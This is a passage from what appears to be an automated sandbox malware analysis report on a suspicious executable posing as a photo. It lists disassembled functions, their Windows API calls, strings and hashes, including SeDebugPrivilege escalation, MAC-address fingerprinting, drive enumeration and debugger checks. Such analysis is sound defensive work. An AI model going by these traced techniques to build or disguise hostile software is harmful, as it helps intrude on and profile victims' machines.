                                                                • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,00000000), ref: 004600BD
                                                                • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,00000000,0059B5F9,000000FF,?,0044E346,00632298,?,00000000,?,759113C0), ref: 004600CF
                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,0059B5F9,000000FF,?,0044E346,00632298,?,00000000,?,759113C0), ref: 004600D2
                                                                • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?), ref: 004600E5
                                                                • __snwprintf.LIBCMT ref: 00460134
                                                                  • Part of subcall function 0045FD80: LoadLibraryW.KERNEL32 ref: 0045FEAD
                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00000000,0059B5F9,000000FF,?,0044E346,00632298,?,00000000,?,759113C0), ref: 00460143
                                                                • HeapFree.KERNEL32(00000000,?,?,?,?,00000000,0059B5F9,000000FF,?,0044E346,00632298,?,00000000,?,759113C0), ref: 00460146
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Heap$AdaptersAddressesProcess$AllocFreeLibraryLoad__snwprintf
                                                                • String ID: %02x%02x%02x%02x%02x%02x$Kc$Kc
                                                                • API String ID: 150322933-3117635755
                                                                • Opcode ID: da29b081e376e05d3ec2763779122fe8d54ebc0600f913cd3364cdcb222659c5
                                                                • Instruction ID: 32c5acb6f20055012bc9d4fb09afe06f7314a15e6744d74e4df40a8d02e05181
                                                                • Opcode Fuzzy Hash: da29b081e376e05d3ec2763779122fe8d54ebc0600f913cd3364cdcb222659c5
                                                                • Instruction Fuzzy Hash: 7B21ABB26051302AC3205756AC55FB7BBBCDF8B751F040197F9498B392E569DD00C3B5
                                                                Function 00407096 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 136COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 004070A0
                                                                  • Part of subcall function 00448C30: GetModuleFileNameW.KERNEL32(00000000,?,00000200), ref: 00448C96
                                                                  • Part of subcall function 0044C4F0: _wcslen.LIBCMT ref: 0044C53D
                                                                • _memset.LIBCMT ref: 0040716C
                                                                • GetLogicalDriveStringsW.KERNEL32(00000064,?,?,?,00000001,3D09168B,about_protocol,about_protocol_default), ref: 0040717D
                                                                • _memset.LIBCMT ref: 004071B8
                                                                • GetDriveTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,3D09168B,about_protocol,about_protocol_default), ref: 004071E1
                                                                • PathAppendW.SHLWAPI(?,005FDFEC,?,?,?,?,?,?,?,?,00000001,3D09168B,about_protocol,about_protocol_default), ref: 004071F8
                                                                • PathAppendW.SHLWAPI(?,?,?,?,?,?,?,?,?,?,00000001,3D09168B,about_protocol,about_protocol_default), ref: 00407210
                                                                • _wcslen.LIBCMT ref: 0040725E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: AppendDrivePath_memset_wcslen$FileH_prolog3_LogicalModuleNameStringsType
                                                                • String ID: %s\%s
                                                                • API String ID: 1882807239-4073750446
                                                                • Opcode ID: 29097902e14148ad7802b8fd631e8ca0160c11b950f1dee71bfa75ccc55b9ceb
                                                                • Instruction ID: 8d1b1268084198545d3a5db07d573d51a8266142c61fcfeffe9c69db7aa46a52
                                                                • Opcode Fuzzy Hash: 29097902e14148ad7802b8fd631e8ca0160c11b950f1dee71bfa75ccc55b9ceb
                                                                • Instruction Fuzzy Hash: 3E512C71C4022C9BDB22EBA5CD45BCEB7BCAB04304F4040EBE509B7192D6786F848F69
                                                                Function 004496F0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 0044970D
                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00449714
                                                                • GetLastError.KERNEL32 ref: 0044971E
                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00449743
                                                                • CloseHandle.KERNEL32(?), ref: 00449751
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Process$CloseCurrentErrorHandleLastLookupOpenPrivilegeTokenValue
                                                                • String ID: SeDebugPrivilege
                                                                • API String ID: 2515219909-2896544425
                                                                • Opcode ID: a43684765bf3f144377690ce9f9cc3e17c2fba07156036d38ddd31d26e53bd54
                                                                • Instruction ID: 751717430d596d379be519a42f446c606b3e8b39329577d008cc32274d6b4105
                                                                • Opcode Fuzzy Hash: a43684765bf3f144377690ce9f9cc3e17c2fba07156036d38ddd31d26e53bd54
                                                                • Instruction Fuzzy Hash: 10312F71A00208AFDF14EFF4D949BEEBBF4EF59304F10455EE806A7640EA749A04DB65
                                                                Function 004236D3 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 47libraryregistryloaderCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • LoadLibraryW.KERNEL32(USER32.DLL,00000008), ref: 004236F0
                                                                • GetProcAddress.KERNEL32(00000000,UpdateLayeredWindow), ref: 004236FC
                                                                • _memset.LIBCMT ref: 00423718
                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00423748
                                                                • RegisterClassExW.USER32(00000030), ref: 00423769
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Load$AddressClassCursorLibraryProcRegister_memset
                                                                • String ID: 0$USER32.DLL$UpdateLayeredWindow$.`
                                                                • API String ID: 3196463583-211402035
                                                                • Opcode ID: f77de1b1488d639c9a2e8e91ed9eaf38ec2ea3f3990c9374cac5512e39eca641
                                                                • Instruction ID: 86b84ad38ec022f1148645de70c0ec349560c464f27ebd158583476eb68e5e8b
                                                                • Opcode Fuzzy Hash: f77de1b1488d639c9a2e8e91ed9eaf38ec2ea3f3990c9374cac5512e39eca641
                                                                • Instruction Fuzzy Hash: EA112AB0D51229ABCB01EFA4EC59ADEBBB8BF09704F10401AE401A3250D7B95649CBE5
                                                                Function 0043012D Relevance: 14.5, APIs: 2, Strings: 6, Instructions: 502COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: DNEI$ETLP$IBgC$RDHI$SNRt$TADI
                                                                • API String ID: 0-81932513
                                                                • Opcode ID: 6bef6e06fde4f4922b665b145735dadd4f9fba8ec60e1226b181ed2db2931493
                                                                • Instruction ID: 08c5e815366c4f321ff5f9eda4f1dfa205de05831e8a797415cd394aa78bbd2a
                                                                • Opcode Fuzzy Hash: 6bef6e06fde4f4922b665b145735dadd4f9fba8ec60e1226b181ed2db2931493
                                                                • Instruction Fuzzy Hash: 1122F4B0A00325DFDB24DF24D8A03AAB7A1BF08314F14A2ABD55997341D7389D95CF9D
                                                                Function 00455B40 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 199COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _wcslen$Exception@8Throw
                                                                • String ID: ProtoValue operator[string] wrong type$core\ProtoValue.cpp$device_id
                                                                • API String ID: 3502004985-3911006849
                                                                • Opcode ID: 5ec4287969095ef8e59536c8e5e9a56671951829d902ea3f95dbe8d354cbeeab
                                                                • Instruction ID: d4989b35e35e3f0b76dd25a32db30f9b217094ab626f49cec93077925584aed9
                                                                • Opcode Fuzzy Hash: 5ec4287969095ef8e59536c8e5e9a56671951829d902ea3f95dbe8d354cbeeab
                                                                • Instruction Fuzzy Hash: FB818DB15083808FD724EF29C84579FB7E4BF85704F408A1EF89997291DBB8A808CB57
                                                                Function 02471776 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 0247178C
                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 02471793
                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,10019640,?), ref: 024717AC
                                                                • CloseHandle.KERNEL32(?), ref: 024717B9
                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 024717EA
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288761111.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2470000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
                                                                • String ID: SeDebugPrivilege
                                                                • API String ID: 3038321057-2896544425
                                                                • Opcode ID: 65563e1a8e3832fbb6c380807a9fba19cd747d33f14486cfd924003a378bf1d3
                                                                • Instruction ID: de7176be3c8ba786fc52d9cb46118ba8d1e1f486d91ed7943c706a5758b025b9
                                                                • Opcode Fuzzy Hash: 65563e1a8e3832fbb6c380807a9fba19cd747d33f14486cfd924003a378bf1d3
                                                                • Instruction Fuzzy Hash: AB11ED71A00219EBEF11DFA5CC89BFFBBB8BB08704F108419E619E7290D774D5459B60
                                                                Function 10001772 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 10001788
                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 1000178F
                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,10019640,?), ref: 100017A8
                                                                • CloseHandle.KERNEL32(?), ref: 100017B5
                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,00000000,00000000), ref: 100017E6
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3289331015.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10001000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_10001000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
                                                                • String ID: SeDebugPrivilege
                                                                • API String ID: 3038321057-2896544425
                                                                • Opcode ID: 65563e1a8e3832fbb6c380807a9fba19cd747d33f14486cfd924003a378bf1d3
                                                                • Instruction ID: c94fb9c73ba85f91a1bf98ab1da07da24dcb44c607899cb9a50e2487d36010b3
                                                                • Opcode Fuzzy Hash: 65563e1a8e3832fbb6c380807a9fba19cd747d33f14486cfd924003a378bf1d3
                                                                • Instruction Fuzzy Hash: 4A112970A04219EBFB01CFE1CC8ABEEBBB8FB08744F008419E605EB180D774E9459B60
                                                                Function 0044C190 Relevance: 9.3, APIs: 6, Instructions: 288COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: _wcslen$_memmove
                                                                • String ID:
                                                                • API String ID: 1304002212-0
                                                                • Opcode ID: 5d4ab962c2ecaef256ac505b4ab847d7ef66c6fc100071c1fbe8d0cfb558f82a
                                                                • Instruction ID: 17e94adee846899364149aaadc958b46224c0427bfbe458c80f35187074aa655
                                                                • Opcode Fuzzy Hash: 5d4ab962c2ecaef256ac505b4ab847d7ef66c6fc100071c1fbe8d0cfb558f82a
                                                                • Instruction Fuzzy Hash: 33B191B1D01214DBDF14DFA9C9819AEF7B5FF48304F14852FE815A7240EBB8A905CBA9
                                                                Function 004118A5 Relevance: 9.1, APIs: 6, Instructions: 68windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • IsIconic.USER32(?), ref: 004118D2
                                                                • GetWindowRect.USER32(?,?), ref: 004118FA
                                                                • OffsetRect.USER32(?,?,?), ref: 00411910
                                                                • CreateRoundRectRgn.GDI32(?,?,00000000,00000000,?,?), ref: 0041192C
                                                                • SetWindowRgn.USER32(?,00000000,00000001), ref: 0041193A
                                                                • DeleteObject.GDI32(00000000), ref: 00411941
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: Rect$Window$CreateDeleteIconicObjectOffsetRound
                                                                • String ID:
                                                                • API String ID: 2749569207-0
                                                                • Opcode ID: 5e92ce296ca36766ac2f4a76a9c3219f68d23089d26deb8e2616c6f5f8fc0ecd
                                                                • Instruction ID: f87406e963de4995418832667a1d7e2421f5338783f2e43c0ab95f74eaf6bd1d
                                                                • Opcode Fuzzy Hash: 5e92ce296ca36766ac2f4a76a9c3219f68d23089d26deb8e2616c6f5f8fc0ecd
                                                                • Instruction Fuzzy Hash: EA21F3B5A00209AFCF11EFA5DD848AFBBF9FF49301F10441AE616A2220D775AA45DF60
                                                                Function 00449320 Relevance: 7.6, APIs: 5, Instructions: 103processCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 00449353
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000667000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.00000000006A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: CreateSnapshotToolhelp32
                                                                • String ID:
                                                                • API String ID: 3332741929-0
                                                                • Opcode ID: a6776833abe9815338b12ec6a3117d438d0dce90733df64af13967c83fe524bc
                                                                • Instruction ID: 9000e2ba540964c903ad8ebd0d6229af37d4c14d633276e03a4c57ca5fad95f1
                                                                • Opcode Fuzzy Hash: a6776833abe9815338b12ec6a3117d438d0dce90733df64af13967c83fe524bc
                                                                • Instruction Fuzzy Hash: E331A8326001189BDB10EF69DC856FFB3A5EF69318F1406ABDC0AC7280D7399E45D664
                                                                Function 0247A505 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • IsDebuggerPresent.KERNEL32 ref: 0247C5D9
                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0247C5EE
                                                                • UnhandledExceptionFilter.KERNEL32(10017614), ref: 0247C5F9
                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 0247C615
                                                                • TerminateProcess.KERNEL32(00000000), ref: 0247C61C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288761111.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_2470000_photo_2024-09-18_20-00-20.jbxd
                                                                Similarity
                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                • String ID:
                                                                • API String ID: 2579439406-0
                                                                • Opcode ID: 0c6e12013528028966c606dde08bd82a8eb63e0bad2ee112bf7fee5026609698
                                                                • Instruction ID: 6a1ec74151667b215d93eab10a387cdaf506e38c1799866e24da1019cac884db
                                                                • Opcode Fuzzy Hash: 0c6e12013528028966c606dde08bd82a8eb63e0bad2ee112bf7fee5026609698
                                                                • Instruction Fuzzy Hash: 5121CBB8810324EFE751DF28CCC86547BBABB08314F60815AF80887372E7B19686CF05
                                                                Function 00489DC1 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                • IsDebuggerPresent.KERNEL32 ref: 00495227
                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0049523C
                                                                • UnhandledExceptionFilter.KERNEL32(005AED00), ref: 00495247
                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 00495263
                                                                • TerminateProcess.KERNEL32(00000000), ref: 0049526A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3288057314.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.3288042409.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288177763.00000000005AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288224923.000000000061E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288240706.0000000000620000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288256476.0000000000629000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288270655.000000000062C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.000000000062E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288283098.0000000000632000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.3288306471.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
